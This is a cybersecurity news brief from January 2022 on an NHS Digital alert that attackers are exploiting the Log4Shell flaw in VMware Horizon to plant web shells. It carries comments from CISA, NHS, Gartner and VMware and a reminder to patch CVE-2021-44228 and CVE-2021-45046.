Skip to main content
close search
site logo
Dive Brief

Log4Shell threat activity targeting VMware Horizon, UK researchers warn

Published Jan. 10, 2022
David Jones's headshot
Reporter
Ransomware virus has encrypted data. Attacker is offering key to unlock encrypted data for money.
vchal via Getty Images

Dive Brief:

  • NHS Digital, an information technology partner for the U.K. health system, said threat actors are targeting Log4Shell vulnerabilities in VMware Horizon to to create web shells, which can be used to steal data, introduce additional malicious software or launch a ransomware attack.
  • VMware Horizon is a widely used virtual desktop application that allows workers to operate remotely and VMware issued security updates for its software following the initial Log4J vulnerability disclosures in December. The NHS Digital alert did not specify whether the activity was related to activity seen within the health service or if it involved other targets.  
  • "CISA is aware of the NHS alert regarding potential targeting of VMware products," a spokesperson for the Cybersecurity and Infrastructure Security Agency said via email. CISA is working with government and private industry officials to understand potential risks to federal agencies and critical infrastructure.

Dive Insight:

The attackers are likely using the Java Naming and Directory Interface during the initial reconnaissance phase as a call back method using Log4Shell payloads, according to NHS Digital. The Lightweight Directory Access Protocol is then used to execute a malicious Java class file in order to insert a web shell into the VM Blast Secure Gateway service, according to NHS Digital.

"We are supporting our partners with the system response to this critical vulnerability and will continue to provide guidance to NHS organizations," a spokesman for NHS said in an emailed statement. "This includes guidance on how to prevent and detect exploitation techniques that could be used by threat actors."

Government officials in the U.K. are working with U.S. and other allied agencies on efforts to fight the growing number of threat actors looking to take advantage of the Log4j vulnerability to launch attacks. 

Security researchers from Microsoft, Mandiant, CrowdStrike, and other firms warned that various criminal and nation-state affiliates have launched reconnaissance and more direct attacks on targets in an attempt to exploit the Log4j vulnerability. The threat is considered extremely dangerous because attackers do not need a high level of sophistication or experience to initiate attacks with this vulnerability. 

"What is most interesting, and makes this problem so pernicious is that the vulnerability was uncovered in a subsystem of VMWare Horizon, Apache Tomcat, which is a widely used application server," said Jonathan Care, Gartner senior research director. "Tomcat uses Log4j to perform logging services, and so the vulnerability is exposed."

In response to last week's NHS Digital alert, VMware issued a similar statement to the one it provided in December regarding how it prioritizes the security of its customers and pointed to the statement it issued in a Dec. 10 security advisory VMSA-2021-0028. The company also noted that any service connected to the internet that is not patched against CVE-2021-44228 and CVE-2021-45046 is vulnerable to hackers and should be patched. 

Filed Under: Vulnerability

Editors' picks

Company Announcements

View all | Post a press release
Fathom5’s ARIA Technology Joins NSIN Propel Maritime Digital Defense Accelerator
From Fathom5
November 18, 2024
DigiCert Unveils 2025 Security Predictions
From DigiCert
November 21, 2024
Nile Adds Industry’s First Campus Zero Trust Delivered As a Service
From Nile
November 21, 2024
TrustNet Named 2024’s Best Compliance Advisory and Audit Firm at CDM’s Annual Top InfoSec Inno…
From TrustNet
November 06, 2024
Editors' picks
Latest in Vulnerability
image/svg+xml
Industry Dive is an Informa business
© 2024 Industry Dive. All rights reserved. | View our other publications | Privacy policy | Terms of use | Take down policy.
Cookie Preferences / Do Not Sell